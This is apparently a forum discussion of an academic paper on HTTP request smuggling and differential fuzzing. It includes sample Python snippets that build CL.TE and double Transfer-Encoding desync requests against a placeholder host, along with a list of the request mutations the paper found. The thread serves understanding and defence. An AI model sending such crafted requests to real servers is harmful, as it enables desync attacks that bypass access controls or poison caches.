On the whole, what I found more interesting here were the techniques they came across through fuzzing that had some impact. Yes, it's interesting to see the specific combinations that were affected, but in the real world there are so many other potential combinations.
The dominant method for request smuggling over the last few years has involved conflicts between `Content-Length` and `Transfer-Encoding`. As someone who has worked doing web-app assessments, what I found most interesting, and the biggest takeaway, is simply the set of attacks they found to work and cause problems.
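To make the classic `Content-Length`/`Transfer-Encoding` conflict concrete, here's a small sketch (my own illustration, not taken from the paper; the host and payload bytes are made up) of how two hops can frame the same CL.TE request differently:

```python
# Classic CL.TE desync payload (illustrative). A front end that trusts
# Content-Length forwards all 13 body bytes; a back end that trusts
# Transfer-Encoding stops at the terminating 0-length chunk, leaving
# "SMUGGLED" on the socket to prefix the next request.
payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"          # hypothetical target
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)

body = payload.split(b"\r\n\r\n", 1)[1]

# Content-Length view: the body is the declared 13 bytes.
cl_body = body[:13]

# Chunked view: the body ends at the 0-length chunk; the rest is leftover.
te_body, _, leftover = body.partition(b"0\r\n\r\n")

print(cl_body)    # b'0\r\n\r\nSMUGGLED'
print(leftover)   # b'SMUGGLED'
```

The whole attack class boils down to that disagreement: two parsers, one byte stream, two different ideas of where the request ends.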
I mean, the details about particular server pairs having issues are great information, as is the fuzzing setup (great use of differential fuzzing), but I think more important is being able to take the attack avenues they had success with and run them against your own deployments. Given how many applications internally are running their own stacks, there is still a lot of room for potential issues. I can imagine people running with some of these for bounties in the near future.
A brief summary of the manipulations they had some success with is on pages 7-8. Though if you don't feel like reading, the "headline" version of the list gives you a pretty decent idea of what was having an impact:
Request Line Mutations
- Mangled Method
- Distorted Protocol
- Invalid Version
- Manipulated Termination
- Embedded Request Lines
Request Headers Mutations
- Distorted Header Value
- Manipulated Termination
- Expect Header
- Identity Encoding
- V1.0 Chunked Encoding
- Double Transfer-Encoding
Request Body Mutations
- Chunk-Size Chunk-Data Mismatch
- Manipulated Chunk-Size Termination
- Manipulated Chunk-Extension Termination
- Manipulated Chunk-Data Termination
- Mangled Last-Chunk
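As an example of what one of these header mutations can look like, here's a hypothetical instance of "Double Transfer-Encoding" (my own sketch, not a payload from the paper): two `Transfer-Encoding` headers where one hop might honor the first value and another hop the last, so they disagree on the framing.

```python
# Hypothetical "Double Transfer-Encoding" mutation: duplicate TE headers.
# A hop taking the first value frames the body as chunked; a hop taking
# the last value (identity) may fall back to Content-Length instead.
req = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"              # hypothetical target
    b"Transfer-Encoding: chunked\r\n"
    b"Transfer-Encoding: identity\r\n"
    b"Content-Length: 8\r\n"
    b"\r\n"
    b"SMUGGLED"
)

header_lines = req.split(b"\r\n\r\n", 1)[0].split(b"\r\n")[1:]
te_values = [h.split(b":", 1)[1].strip() for h in header_lines
             if h.lower().startswith(b"transfer-encoding")]

print(te_values)   # [b'chunked', b'identity'] -- which one wins is parser-dependent
```

Whether a given server rejects this outright, takes the first value, or takes the last is exactly the kind of divergence their differential fuzzer is hunting for.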
And a bit of self-promotion, but we talked about this paper on Monday on the DAY podcast I cohost (24m53s - 35m30s): https://www.youtube.com/watch?v=GmOuX8nHZuc&t=1497s
You know, articles like this make me wish an OS would actually have a built-in fast, reliable, fully-featured HTTP parser. I've written a couple of (very strict) HTTP parsers on my own, and this whole "request smuggling" business is possible only because HTTP messages have rather delicate, fragile, totally non-robust framing and structure. Miss a letter in one of the relevant RFCs (IIRC, you need to read at least the first 3 RFCs to learn the complete wire format of an HTTP message) and you'll end up with a subtly non-compliant and vulnerable parser.
And yet, every single programming language/platform builds its own HTTP-handling library, usually several, of very varying quality and feature support. Again, it would not be as bad if HTTP were a robust format where you could skip recognizing and correctly dealing with the half of the features you don't intend to support, but it is not: even if you don't want to accept e.g. trailers, you still have to be aware of them. We have OpenSSL, why not also have OpenHTTP (in sans-io style)?
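To illustrate how easy it is to "miss a letter" in the framing rules, here's a sketch (the function names are mine) of a lenient vs. strict chunk-size parser. The chunk-size field is defined as plain hex digits only, but a parser built naively on `int(s, 16)` silently accepts inputs another hop may reject or read differently:

```python
# Sketch: a lenient hex parser quietly widens the chunked grammar.
def lenient_chunk_size(line: bytes) -> int:
    # Python's int() accepts b"0x5", b"+5", b" 5", even b"1_0" here,
    # none of which are valid chunk-size tokens on the wire.
    return int(line, 16)

def strict_chunk_size(line: bytes) -> int:
    # Accept only one-or-more bare hex digits, nothing else.
    if not line or any(c not in b"0123456789abcdefABCDEF" for c in line):
        raise ValueError("chunk-size must be bare hex digits")
    return int(line, 16)

print(lenient_chunk_size(b"0x5"))  # 5 -- while a stricter peer may reject or see 0
```

Two hops disagreeing on whether `0x5` is a valid chunk size (or what it means) is precisely the kind of framing ambiguity these smuggling attacks exploit.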
the eternal cat-and-mouse game, an escher triangle of misery, always going up and down at the same time, never really getting anywhere
Nice. Link to the whitepaper: https://bahruz.me/papers/ccs2021treqs.pdf
I only skimmed very quickly to look for which server setups they found new vulnerabilities for, and it looked like they tested a 2D matrix of popular webservers/caches/reverse-proxies with each other? Which is neat for automation, but in the real world I'm not usually going to be running haproxy behind nginx or vice versa. I'd be much more interested in findings for popular webserver->appserver setups, e.g., nginx in front of gunicorn/django.
This sort of thing is why it's nice to have authz throughout your environment. A client request that gets incorrectly forwarded to a proxy should be rejected by the downstream service.
The problem is that people keep all of their authn/authz at the boundary and then, once you're past that, it's a free-for-all.
Every service needs to validate authorization of the request.